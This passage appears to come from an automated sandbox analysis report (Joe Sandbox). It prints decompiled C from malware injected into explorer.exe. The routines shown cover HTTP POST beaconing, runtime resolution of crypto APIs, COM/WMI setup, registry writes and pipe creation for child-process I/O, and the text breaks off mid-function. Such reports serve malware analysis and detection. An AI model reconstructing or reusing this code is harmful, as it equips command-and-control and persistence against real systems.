                  							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
                  							_v8 = 0x493e0;
                  							_t124 =  *0x9e6a4; // 0x0
                  							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
                  							_v8 = 0x493e0;
                  							_t127 =  *0x9e6a4; // 0x0
                  							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
                  							_t131 =  *0x9e6a4; // 0x0
                  							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
                  							if(_a24 != 0) {
                  								E0008980C(_a24);
                  							}
                  							if(_t186 != 0) {
                  								_t133 = 0x8484f700;
                  								if(_v112 != 4) {
                  									_t133 = _v12;
                  								}
                  								_t136 =  *0x9e6a4; // 0x0
                  								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
                  								_v8 = _t216;
                  								if(_a24 != 0) {
                  									E0008980C(_a24);
                  								}
                  								if(_t216 != 0) {
                  									_t138 = 4;
                  									if(_v112 != _t138) {
                  										L19:
                  										_t139 = E000895C7(0x777);
                  										_t217 = _t139;
                  										_v12 = _t217;
                  										_t141 =  *0x9e6a4; // 0x0
                  										_t218 = _v8;
                  										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E0008C379(_t217), _a4, _a8);
                  										E000885C2( &_v12);
                  										if(_a24 != 0) {
                  											E0008980C(_a24);
                  										}
                  										if(_v28 != 0) {
                  											L28:
                  											_v24 = 8;
                  											_push(0);
                  											_v32 = 0;
                  											_v28 = 0;
                  											_push( &_v24);
                  											_push( &_v32);
                  											_t147 =  *0x9e6a4; // 0x0
                  											_push(0x13);
                  											_push(_t218);
                  											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
                  												_t219 = E00089749( &_v32);
                  												if(_t219 == 0xc8) {
                  													 *_a20 = _v8;
                  													 *_a12 = _t213;
                  													 *_a16 = _t186;
                  													return 0;
                  												}
                  												_t220 =  ~_t219;
                  												L32:
                  												_t154 =  *0x9e6a4; // 0x0
                  												 *((intOrPtr*)(_t154 + 8))(_v8);
                  												L33:
                  												if(_t186 != 0) {
                  													_t158 =  *0x9e6a4; // 0x0
                  													 *((intOrPtr*)(_t158 + 8))(_t186);
                  												}
                  												if(_t213 != 0) {
                  													_t203 =  *0x9e6a4; // 0x0
                  													 *((intOrPtr*)(_t203 + 8))(_t213);
                  												}
                  												return _t220;
                  											}
                  											GetLastError();
                  											_t220 = 0xfffffff8;
                  											goto L32;
                  										} else {
                  											GetLastError();
                  											_t162 =  *0x9e6a4; // 0x0
                  											 *((intOrPtr*)(_t162 + 8))(_t218);
                  											_t218 = 0;
                  											goto L23;
                  										}
                  									}
                  									_v12 = _t138;
                  									_push( &_v12);
                  									_push( &_v16);
                  									_t172 =  *0x9e6a4; // 0x0
                  									_push(0x1f);
                  									_push(_t216);
                  									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
                  										L18:
                  										GetLastError();
                  										goto L19;
                  									}
                  									_v16 = _v16 | 0x00003380;
                  									_push(4);
                  									_push( &_v16);
                  									_t176 =  *0x9e6a4; // 0x0
                  									_push(0x1f);
                  									_push(_t216);
                  									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
                  										goto L19;
                  									}
                  									goto L18;
                  								} else {
                  									GetLastError();
                  									L23:
                  									_t164 =  *0x9e6a4; // 0x0
                  									 *((intOrPtr*)(_t164 + 8))(_t186);
                  									_t186 = 0;
                  									goto L24;
                  								}
                  							} else {
                  								GetLastError();
                  								L24:
                  								_t166 =  *0x9e6a4; // 0x0
                  								 *((intOrPtr*)(_t166 + 8))(_t213);
                  								_t213 = 0;
                  								goto L25;
                  							}
                  						}
                  						GetLastError();
                  						L25:
                  						_t204 = _t218;
                  						_t209 = _v20 + 1;
                  						_v20 = _t209;
                  					} while (_t209 < 2);
                  					_v8 = _t218;
                  					if(_t204 != 0) {
                  						goto L28;
                  					}
                  					_t220 = 0xfffffffe;
                  					goto L33;
                  				}
                  				_t183 = 0xfffffffc;
                  				return _t183;
                  			}

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: memset$ErrorLast
                  • String ID: POST
                  • API String ID: 2570506013-1814004025
                  • Opcode ID: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
                  • Instruction ID: ea6434b96816f391ca67125378d8c048189af0a816e14d9e93347baa296bf716
                  • Opcode Fuzzy Hash: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
                  • Instruction Fuzzy Hash: 50B13C71900208AFEB55EFA4DC89EAE7BB8FF58310F10406AF545EB291DB749E44CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 28%
                  			E000916B8(signed int* _a4) {
                  				char _v8;
                  				_Unknown_base(*)()* _v12;
                  				_Unknown_base(*)()* _v16;
                  				char _v20;
                  				_Unknown_base(*)()* _t16;
                  				_Unknown_base(*)()* _t17;
                  				void* _t22;
                  				intOrPtr* _t28;
                  				signed int _t29;
                  				signed int _t30;
                  				struct HINSTANCE__* _t32;
                  				void* _t34;
                  
                  				_t30 = 0;
                  				_v8 = 0;
                  				_t32 = GetModuleHandleA("advapi32.dll");
                  				if(_t32 == 0) {
                  					L9:
                  					return 1;
                  				}
                  				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
                  				_v12 = _t16;
                  				if(_t16 == 0) {
                  					goto L9;
                  				}
                  				_t17 = GetProcAddress(_t32, "CryptGenRandom");
                  				_v16 = _t17;
                  				if(_t17 == 0) {
                  					goto L9;
                  				}
                  				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
                  				if(_t28 == 0) {
                  					goto L9;
                  				}
                  				_push(0xf0000000);
                  				_push(1);
                  				_push(0);
                  				_push(0);
                  				_push( &_v8);
                  				if(_v12() == 0) {
                  					goto L9;
                  				}
                  				_t22 = _v16(_v8, 4,  &_v20);
                  				 *_t28(_v8, 0);
                  				if(_t22 == 0) {
                  					goto L9;
                  				}
                  				_t29 = 0;
                  				do {
                  					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
                  					_t29 = _t29 + 1;
                  				} while (_t29 < 4);
                  				 *_a4 = _t30;
                  				return 0;
                  			}

                  APIs
                  • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,0008765A,?,?,00000000,?), ref: 000916CB
                  • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 000916E3
                  • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 000916F2
                  • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 00091701
                  Strings
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AddressProc$HandleModule
                  • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                  • API String ID: 667068680-129414566
                  • Opcode ID: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
                  • Instruction ID: f7ee788a374f61118607f953ef7ffa495e5dc05b0280f9c56cf14542586de261
                  • Opcode Fuzzy Hash: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
                  • Instruction Fuzzy Hash: B5117731B046177BDF515BEA8C84EEFBBF9AF46780B044065FA15F6240DA70D901A764
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 87%
                  			E00092122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
                  				signed int _t12;
                  				signed int _t13;
                  				int _t15;
                  				char* _t24;
                  				char* _t26;
                  				char* _t28;
                  				char* _t29;
                  				signed int _t40;
                  				char* _t43;
                  				char* _t45;
                  				long long* _t47;
                  
                  				_t12 = _a20;
                  				if(_t12 == 0) {
                  					_t12 = 0x11;
                  				}
                  				_t26 = _a4;
                  				_push(_t30);
                  				 *_t47 = _a12;
                  				_push(_t12);
                  				_push("%.*g");
                  				_push(_a8);
                  				_push(_t26);
                  				L00092285();
                  				_t40 = _t12;
                  				if(_t40 < 0 || _t40 >= _a8) {
                  					L19:
                  					_t13 = _t12 | 0xffffffff;
                  					goto L20;
                  				} else {
                  					L000922CD();
                  					_t15 =  *((intOrPtr*)( *_t12));
                  					if(_t15 != 0x2e) {
                  						_t24 = strchr(_t26, _t15);
                  						if(_t24 != 0) {
                  							 *_t24 = 0x2e;
                  						}
                  					}
                  					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
                  						L11:
                  						_t43 = strchr(_t26, 0x65);
                  						_t28 = _t43;
                  						if(_t43 == 0) {
                  							L18:
                  							_t13 = _t40;
                  							L20:
                  							return _t13;
                  						}
                  						_t45 = _t43 + 1;
                  						_t29 = _t28 + 2;
                  						if( *_t45 == 0x2d) {
                  							_t45 = _t29;
                  						}
                  						while( *_t29 == 0x30) {
                  							_t29 = _t29 + 1;
                  						}
                  						if(_t29 != _t45) {
                  							E00088706(_t45, _t29, _t40 - _t29 + _a4);
                  							_t40 = _t40 + _t45 - _t29;
                  						}
                  						goto L18;
                  					} else {
                  						_t6 = _t40 + 3; // 0x909b2
                  						_t12 = _t6;
                  						if(_t12 >= _a8) {
                  							goto L19;
                  						}
                  						_t26[_t40] = 0x302e;
                  						( &(_t26[2]))[_t40] = 0;
                  						_t40 = _t40 + 2;
                  						goto L11;
                  					}
                  				}
                  			}

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: strchr$_snprintflocaleconv
                  • String ID: %.*g
                  • API String ID: 1910550357-952554281
                  • Opcode ID: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
                  • Instruction ID: 1807b53470dfa9210b137be6f10a1510799a81b613ee7934cd0fe15d2e85ebbb
                  • Opcode Fuzzy Hash: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
                  • Instruction Fuzzy Hash: 8E216A766047427ADF259A28DCC6BEA3BDCDF25330F150155FE509A182EA74EC60B3A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: _snprintfqsort
                  • String ID: %I64d$false$null$true
                  • API String ID: 756996078-4285102228
                  • Opcode ID: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
                  • Instruction ID: e8f87335b98eb15e4b72e6aadc3c6444a94586e470a32963d335527edd021b66
                  • Opcode Fuzzy Hash: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
                  • Instruction Fuzzy Hash: F1E17DB190020ABFDF119F64CC46EEF3BA9EF55384F108019FE1596152EB31DA61EBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 79%
                  			E00084A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
                  				char _v516;
                  				void _v1044;
                  				char _v1076;
                  				signed int _v1080;
                  				signed int _v1096;
                  				WCHAR* _v1100;
                  				intOrPtr _v1104;
                  				signed int _v1108;
                  				intOrPtr _v1112;
                  				intOrPtr _v1116;
                  				char _v1144;
                  				char _v1148;
                  				void* __esi;
                  				intOrPtr _t66;
                  				intOrPtr _t73;
                  				signed int _t75;
                  				intOrPtr _t76;
                  				signed int _t81;
                  				WCHAR* _t87;
                  				void* _t89;
                  				signed int _t90;
                  				signed int _t91;
                  				signed int _t93;
                  				signed int _t94;
                  				WCHAR* _t96;
                  				intOrPtr _t106;
                  				intOrPtr _t107;
                  				void* _t108;
                  				intOrPtr _t109;
                  				signed char _t116;
                  				WCHAR* _t118;
                  				void* _t122;
                  				signed int _t123;
                  				intOrPtr _t125;
                  				void* _t128;
                  				void* _t129;
                  				WCHAR* _t130;
                  				void* _t134;
                  				void* _t141;
                  				void* _t143;
                  				WCHAR* _t145;
                  				signed int _t153;
                  				void* _t154;
                  				void* _t178;
                  				signed int _t180;
                  				void* _t181;
                  				void* _t183;
                  				void* _t187;
                  				signed int _t188;
                  				WCHAR* _t190;
                  				signed int _t191;
                  				signed int _t192;
                  				intOrPtr* _t194;
                  				signed int _t196;
                  				void* _t199;
                  				void* _t200;
                  				void* _t201;
                  				void* _t202;
                  				intOrPtr* _t203;
                  				void* _t208;
                  
                  				_t208 = __fp0;
                  				_push(_t191);
                  				_t128 = __edx;
                  				_t187 = __ecx;
                  				_t192 = _t191 | 0xffffffff;
                  				memset( &_v1044, 0, 0x20c);
                  				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
                  				_v1108 = 1;
                  				if(_t187 != 0) {
                  					_t123 =  *0x9e688; // 0xb0000
                  					_t125 =  *0x9e68c; // 0x293fab8
                  					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
                  				}
                  				if(E0008BB8D(_t187) != 0) {
                  					L4:
                  					_t134 = _t128;
                  					_t66 = E0008B7A8(_t134,  &_v516);
                  					_push(_t134);
                  					_v1104 = _t66;
                  					E0008B67D(_t66,  &_v1076, _t206, _t208);
                  					_t129 = E000849C7( &_v1076,  &_v1076, _t206);
                  					_t141 = E0008D400( &_v1076, E0008C379( &_v1076), 0);
                  					E0008B88A(_t141,  &_v1100, _t208);
                  					_t175 =  &_v1076;
                  					_t73 = E00082C8F(_t187,  &_v1076, _t206, _t208);
                  					_v1112 = _t73;
                  					_t143 = _t141;
                  					if(_t73 != 0) {
                  						_push(0);
                  						_push(_t129);
                  						_push("\\");
                  						_t130 = E000892E5(_t73);
                  						_t200 = _t199 + 0x10;
                  						_t75 =  *0x9e688; // 0xb0000
                  						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
                  						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
                  							L12:
                  							__eflags = _v1108;
                  							if(__eflags != 0) {
                  								_t76 = E000891E3(_v1112);
                  								_t145 = _t130;
                  								 *0x9e740 = _t76;
                  								 *0x9e738 = E000891E3(_t145);
                  								L17:
                  								_push(_t145);
                  								_t188 = E00089B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
                  								_t201 = _t200 + 0x10;
                  								__eflags = _t188;
                  								if(_t188 == 0) {
                  									goto L41;
                  								}
                  								_push(0x9b9ca);
                  								E00089F48(0xe);
                  								E00089F6C(_t188, _t208, _t130);
                  								_t194 = _a4;
                  								_v1096 = _v1096 & 0x00000000;
                  								_push(2);
                  								_v1100 =  *_t194;
                  								_push(8);
                  								_push( &_v1100);
                  								_t178 = 0xb;
                  								E0008A0AB(_t188, _t178, _t208);
                  								_t179 =  *(_t194 + 0x10);
                  								_t202 = _t201 + 0xc;
                  								__eflags =  *(_t194 + 0x10);
                  								if( *(_t194 + 0x10) != 0) {
                  									E0008A3ED(_t188, _t179, _t208);
                  								}
                  								_t180 =  *(_t194 + 0xc);
                  								__eflags = _t180;
                  								if(_t180 != 0) {
                  									E0008A3ED(_t188, _t180, _t208);
                  								}
                  								_t87 = E0008980C(0);
                  								_push(2);
                  								_v1100 = _t87;
                  								_t153 = _t188;
                  								_push(8);
                  								_v1096 = _t180;
                  								_push( &_v1100);
                  								_t181 = 2;
                  								_t89 = E0008A0AB(_t153, _t181, _t208);
                  								_t203 = _t202 + 0xc;
                  								__eflags = _v1108;
                  								if(_v1108 == 0) {
                  									_t153 =  *0x9e688; // 0xb0000
                  									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
                  									if(__eflags != 0) {
                  										_t90 = E0008FC1F(_t89, _t181, _t208, 0, _t130, 0);
                  										_t203 = _t203 + 0xc;
                  										goto L26;
                  									}
                  									_t153 = _t153 + 0x228;
                  									goto L25;
                  								} else {
                  									_t91 =  *0x9e688; // 0xb0000
                  									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
                  									if(__eflags != 0) {
                  										L32:
                  										__eflags =  *(_t91 + 0x1898) & 0x00000082;
                  										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
                  											_t183 = 0x64;
                  											E0008E23E(_t183);
                  										}
                  										E000852C0( &_v1076, _t208);
                  										_t190 = _a8;
                  										_t154 = _t153;
                  										__eflags = _t190;
                  										if(_t190 != 0) {
                  											_t94 =  *0x9e688; // 0xb0000
                  											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
                  											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
                  												lstrcpyW(_t190, _t130);
                  											} else {
                  												_t96 = E0008109A(_t154, 0x228);
                  												_v1100 = _t96;
                  												lstrcpyW(_t190, _t96);
                  												E000885D5( &_v1100);
                  												 *_t203 = "\"";
                  												lstrcatW(_t190, ??);
                  												lstrcatW(_t190, _t130);
                  												lstrcatW(_t190, "\"");
                  											}
                  										}
                  										_t93 = _a12;
                  										__eflags = _t93;
                  										if(_t93 != 0) {
                  											 *_t93 = _v1104;
                  										}
                  										_t192 = 0;
                  										__eflags = 0;
                  										goto L41;
                  									}
                  									_t51 = _t91 + 0x228; // 0xb0228
                  									_t153 = _t51;
                  									L25:
                  									_t90 = E0008553F(_t153, _t130, __eflags);
                  									L26:
                  									__eflags = _t90;
                  									if(_t90 >= 0) {
                  										_t91 =  *0x9e688; // 0xb0000
                  										goto L32;
                  									}
                  									_push(0xfffffffd);
                  									L6:
                  									_pop(_t192);
                  									goto L41;
                  								}
                  							}
                  							_t106 = E0008C292(_v1104, __eflags);
                  							_v1112 = _t106;
                  							_t107 =  *0x9e684; // 0x293f8f0
                  							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
                  							__eflags = _t108 - _t192;
                  							if(_t108 != _t192) {
                  								_t109 =  *0x9e684; // 0x293f8f0
                  								 *((intOrPtr*)(_t109 + 0x30))();
                  								E0008861A( &_v1148, _t192);
                  								_t145 = _t108;
                  								goto L17;
                  							}
                  							E0008861A( &_v1144, _t192);
                  							_t81 = 1;
                  							goto L42;
                  						}
                  						_t116 =  *(_t75 + 0x1898);
                  						__eflags = _t116 & 0x00000004;
                  						if((_t116 & 0x00000004) == 0) {
                  							__eflags = _t116;
                  							if(_t116 != 0) {
                  								goto L12;
                  							}
                  							L11:
                  							E0008E286(_v1112, _t175);
                  							goto L12;
                  						}
                  						_v1080 = _v1080 & 0x00000000;
                  						_t118 = E000895E1(_t143, 0x879);
                  						_v1100 = _t118;
                  						_t175 = _t118;
                  						E0008BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
                  						E000885D5( &_v1100);
                  						_t200 = _t200 + 0x14;
                  						goto L11;
                  					}
                  					_push(0xfffffffe);
                  					goto L6;
                  				} else {
                  					_t122 = E00082BA4( &_v1044, _t192, 0x105);
                  					_t206 = _t122;
                  					if(_t122 == 0) {
                  						L41:
                  						_t81 = _t192;
                  						L42:
                  						return _t81;
                  					}
                  					goto L4;
                  				}
                  			}

                  APIs
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: lstrcat$lstrcpy$memset
                  • String ID:
                  • API String ID: 1985475764-0
                  • Opcode ID: 488debc6cf7d0380203fb27e8d1cd97e5587ab3ac04a24f7c3db213fba28b1c0
                  • Instruction ID: dec47ca1d8cbe9d9e50b353cb195f6a6744e81453b5205875f33d8479ea457cb
                  • Opcode Fuzzy Hash: 488debc6cf7d0380203fb27e8d1cd97e5587ab3ac04a24f7c3db213fba28b1c0
                  • Instruction Fuzzy Hash: FC919E71604302AFE754FB24DC86FBA73E9BB84720F14452EF5958B292EB74DD048B92
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SysAllocString.OLEAUT32(00000000), ref: 0008D75C
                  • SysAllocString.OLEAUT32(?), ref: 0008D764
                  • SysAllocString.OLEAUT32(00000000), ref: 0008D778
                  • SysFreeString.OLEAUT32(?), ref: 0008D7F3
                  • SysFreeString.OLEAUT32(?), ref: 0008D7F6
                  • SysFreeString.OLEAUT32(?), ref: 0008D7FB
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: String$AllocFree
                  • String ID:
                  • API String ID: 344208780-0
                  • Opcode ID: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
                  • Instruction ID: a89b29efd16a02d44f6d8e25ac1661f5a2b1d21aaf5940480051179919990030
                  • Opcode Fuzzy Hash: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
                  • Instruction Fuzzy Hash: 1821F975900218AFDB10EFA5CC88DAFBBBDFF48654B10449AF505E7250DA71AE01CB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$\u%04X$\u%04X\u%04X
                  • API String ID: 0-2132903582
                  • Opcode ID: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
                  • Instruction ID: fcde36fe93850f7dd9ad1ae31ae76e92f94782fe824cdb2d7e9ac6baa3171ba9
                  • Opcode Fuzzy Hash: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
                  • Instruction Fuzzy Hash: C6411931700205EFEF784A9CCD9ABBF2AA8DF45340F244125F986D6396DA61CD91B3D1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 30%
                  			E0008D523(void* __ecx) {
                  				char _v8;
                  				void* _v12;
                  				char* _t15;
                  				intOrPtr* _t16;
                  				void* _t21;
                  				intOrPtr* _t23;
                  				intOrPtr* _t24;
                  				intOrPtr* _t25;
                  				void* _t30;
                  				void* _t33;
                  
                  				_v12 = 0;
                  				_v8 = 0;
                  				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
                  				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                  				_t15 =  &_v12;
                  				__imp__CoCreateInstance(0x9b848, 0, 1, 0x9b858, _t15);
                  				if(_t15 < 0) {
                  					L5:
                  					_t23 = _v8;
                  					if(_t23 != 0) {
                  						 *((intOrPtr*)( *_t23 + 8))(_t23);
                  					}
                  					_t24 = _v12;
                  					if(_t24 != 0) {
                  						 *((intOrPtr*)( *_t24 + 8))(_t24);
                  					}
                  					_t16 = 0;
                  				} else {
                  					__imp__#2(__ecx);
                  					_t25 = _v12;
                  					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
                  					if(_t21 < 0) {
                  						goto L5;
                  					} else {
                  						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                  						if(_t21 < 0) {
                  							goto L5;
                  						} else {
                  							_t16 = E00088604(8);
                  							if(_t16 == 0) {
                  								goto L5;
                  							} else {
                  								 *((intOrPtr*)(_t16 + 4)) = _v12;
                  								 *_t16 = _v8;
                  							}
                  						}
                  					}
                  				}
                  				return _t16;
                  			}














                  APIs
                  • CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
                  • CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
                  • SysAllocString.OLEAUT32(00000000), ref: 0008D569
                  • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                  • String ID:
                  • API String ID: 1610782348-0
                  • Opcode ID: 032b65d1a8ed55fd57765c242025f7fd8b4177f10fda5a8d8732fc47c56a4ee4
                  • Instruction ID: 5ca9e363416111ca0ccf9453dcb24a0453d396344b9ddfdbf921160754929c58
                  • Opcode Fuzzy Hash: 032b65d1a8ed55fd57765c242025f7fd8b4177f10fda5a8d8732fc47c56a4ee4
                  • Instruction Fuzzy Hash: 6F21E970600245BBEB249B66DC4DE6FBFBCFFC6B25F10415EB541A62A0DA709A01CB30
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 79%
                  			E000921FF(char* __eax, char** _a4, long long* _a8) {
                  				char* _v8;
                  				long long _v16;
                  				char* _t9;
                  				signed char _t11;
                  				char** _t19;
                  				char _t22;
                  				long long _t32;
                  				long long _t33;
                  
                  				_t9 = __eax;
                  				L000922CD();
                  				_t19 = _a4;
                  				_t22 =  *__eax;
                  				if( *_t22 != 0x2e) {
                  					_t9 = strchr( *_t19, 0x2e);
                  					if(_t9 != 0) {
                  						 *_t9 =  *_t22;
                  					}
                  				}
                  				L00092291();
                  				 *_t9 =  *_t9 & 0x00000000;
                  				_t11 = strtod( *_t19,  &_v8);
                  				asm("fst qword [ebp-0xc]");
                  				_t32 =  *0x98250;
                  				asm("fucomp st1");
                  				asm("fnstsw ax");
                  				if((_t11 & 0x00000044) != 0) {
                  					L5:
                  					st0 = _t32;
                  					L00092291();
                  					if( *_t11 != 0x22) {
                  						_t33 = _v16;
                  						goto L8;
                  					} else {
                  						return _t11 | 0xffffffff;
                  					}
                  				} else {
                  					_t33 =  *0x98258;
                  					asm("fucomp st1");
                  					asm("fnstsw ax");
                  					if((_t11 & 0x00000044) != 0) {
                  						L8:
                  						 *_a8 = _t33;
                  						return 0;
                  					} else {
                  						goto L5;
                  					}
                  				}
                  			}












                  APIs
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: _errno$localeconvstrchrstrtod
                  • String ID:
                  • API String ID: 1035490122-0
                  • Opcode ID: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
                  • Instruction ID: 9be57ecffa989f7d2828815fae2d17a9d7f4e019258d81125002a8d3572c8328
                  • Opcode Fuzzy Hash: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
                  • Instruction Fuzzy Hash: 7701F239904205FADF127F24E9057DD7BA8AF4B360F2041D1E9D0A61E2DB759854E7A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 73%
                  			E0008A9B7(signed int __ecx) {
                  				void* _v8;
                  				void* _v12;
                  				void* _v16;
                  				void* _v20;
                  				signed int _v24;
                  				char _v28;
                  				char _v32;
                  				char _v36;
                  				struct _SECURITY_ATTRIBUTES _v48;
                  				intOrPtr _v60;
                  				char _v64;
                  				intOrPtr _v76;
                  				intOrPtr _v80;
                  				void* _v84;
                  				short _v92;
                  				intOrPtr _v96;
                  				void _v140;
                  				intOrPtr _t77;
                  				void* _t79;
                  				intOrPtr _t85;
                  				intOrPtr _t87;
                  				intOrPtr _t89;
                  				intOrPtr _t92;
                  				intOrPtr _t98;
                  				intOrPtr _t100;
                  				intOrPtr _t102;
                  				long _t111;
                  				intOrPtr _t115;
                  				intOrPtr _t126;
                  				void* _t127;
                  				void* _t128;
                  				void* _t129;
                  				void* _t130;
                  
                  				_t111 = 0;
                  				_v24 = __ecx;
                  				_v12 = 0;
                  				_v20 = 0;
                  				_t127 = 0;
                  				_v8 = 0;
                  				_v16 = 0;
                  				_v48.nLength = 0xc;
                  				_v48.lpSecurityDescriptor = 0;
                  				_v48.bInheritHandle = 1;
                  				_v28 = 0;
                  				memset( &_v140, 0, 0x44);
                  				asm("stosd");
                  				_t130 = _t129 + 0xc;
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
                  					L18:
                  					return 0;
                  				}
                  				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
                  					L13:
                  					E0008861A( &_v28, 0);
                  					if(_v20 != 0) {
